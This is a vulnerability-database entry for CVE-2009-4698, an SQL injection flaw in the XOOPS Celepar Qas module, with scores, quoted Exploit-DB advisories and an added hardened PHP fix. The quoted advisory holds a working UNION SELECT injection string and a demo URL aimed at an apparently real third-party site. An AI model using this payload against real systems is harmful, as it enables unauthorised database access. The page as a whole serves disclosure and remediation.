CVE-2009-4698
Published 2010-03-15
Priority: P3 (46) · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT · EPSS: 1.71% (74.4th percentile)
Multiple SQL injection vulnerabilities in the Qas (aka Quas) module for XOOPS Celepar allow remote attackers to execute arbitrary SQL commands via the codigo parameter to (1) aviso.php and (2) imprimir.php, and the (3) cod_categoria parameter to categoria.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alexandre_amaral | xoops_celepar | — | — |
No detection rules found.
Exploit-DB · 2009-07-27 · CVE-2009-4698: XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting
---
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
IN THE NAME OF ALLAH
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
[»] Xoops Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities
[»] Script: [ Xoops Celepar Module Qas ]
[»] Language: [ PHP ]
[»] Download: [ http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz ]
[»] Founder: [ Moudi ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke
Exploit-DB · 2009-07-24 · CVE-2009-4714: XOOPS Celepar Module Qas - 'codigo' SQL Injection
---
Xoops Celepar Module Qas
Download of Xoops Celepar: http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
Author: s4r4d0
mail:[email protected]
A SQL injection has been found in the Quas module of Xoops Celepar, in the file Aviso.php.
Source code:

```php
// Excerpt of aviso.php as quoted in the advisory (the block closed by the
// first brace is not shown). The request parameter is read from POST or GET
// and used without any validation or escaping.
  }
    $codigo = $_POST['codigo'];
  } else
    $codigo = $_GET['codigo'];
```
Target: site.com.br/modules/qas/aviso.php?codigo=
Sql Code :-1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename
Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
[ Fatal Error Group Br ]
[Greetz: to Elemento_pcx - m4v3rick - w4nt3d - DD3str0yer - M0nt3r - Vympel]
[From Brazil]
# milw0rm.com [2009-07-24]
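As an added example (not the module's code and not from either advisory author), this is the hardened form of the quoted aviso.php fragment: the codigo value is accepted only as a decimal integer and then bound as a prepared-statement parameter, so a payload like the UNION SELECT above is rejected before any query is built. The table name qas_aviso, the DSN and credentials, and the function names are assumptions.

```php
<?php
// Added example, not the XOOPS Celepar module's own code.
// Table name qas_aviso, DSN and credentials are hypothetical.

// Read codigo from POST first, then GET (the original's precedence),
// but accept only a plain decimal integer. Anything else, including
// "-1 UNION SELECT ...", is rejected and never reaches SQL.
function read_codigo(array $post, array $get): ?int {
    $raw = $post['codigo'] ?? $get['codigo'] ?? null;
    if ($raw === null || !preg_match('/^\d{1,10}$/', (string) $raw)) {
        return null;
    }
    return (int) $raw;
}

// Fetch the record with a prepared statement: the value travels as a
// typed bound parameter, never as part of the SQL text.
function fetch_aviso(PDO $db, int $codigo): ?array {
    $stmt = $db->prepare('SELECT * FROM qas_aviso WHERE codigo = :codigo');
    $stmt->bindValue(':codigo', $codigo, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$codigo = read_codigo($_POST, $_GET);
if ($codigo === null) {
    // Invalid or missing parameter: fail closed with a 400, no query run.
    http_response_code(400);
    exit('Invalid codigo parameter.');
}

// Real prepares (no client-side emulation) and exceptions on error,
// so a failed query cannot silently fall through to leaking output.
$db = new PDO('mysql:host=localhost;dbname=xoops', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES   => false,
]);

$aviso = fetch_aviso($db, $codigo);
if ($aviso === null) {
    http_response_code(404);
    exit('Aviso not found.');
}
```

The same pattern applies to the cod_categoria parameter in categoria.php and to imprimir.php, which the CVE description lists as taking the same unvalidated input.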
No writeups or analysis indexed.
References
http://osvdb.org/56593
http://www.osvdb.org/56594
http://osvdb.org/56595
http://secunia.com/advisories/35966
http://www.exploit-db.com/exploits/9249
http://www.exploit-db.com/exploits/9261
http://www.securityfocus.com/bid/35820
https://exchange.xforce.ibmcloud.com/vulnerabilities/51985